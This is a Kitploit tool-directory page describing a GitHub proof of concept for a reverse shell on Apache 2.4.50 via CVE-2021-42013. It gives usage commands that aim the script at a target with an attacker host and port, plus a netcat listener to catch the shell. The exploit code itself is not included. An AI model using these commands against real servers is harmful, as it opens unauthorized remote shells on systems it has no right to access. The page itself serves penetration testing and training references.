Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-42013_Reverse-Shell — PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI | Kitploit
Tools/GitHubGitHub/thelastvvv/cve-2021-42013_reverse-shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubthelastvvv/cve-2021-42013_reverse-shell

CVE-2021-42013_Reverse-Shell

PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
7214 years agoNot yet reviewed
Share

CVE-2021-42013_Reverse-Shell

PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI

Usage :

root@kitploit:~
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

More info:

root@kitploit:~
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
 nc -lvnp 9999
 

References

https://nvd.nist.gov/vuln/detail/CVE-2021-42013

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013

https://tryhackme.com/room/cve202141773

Download Tool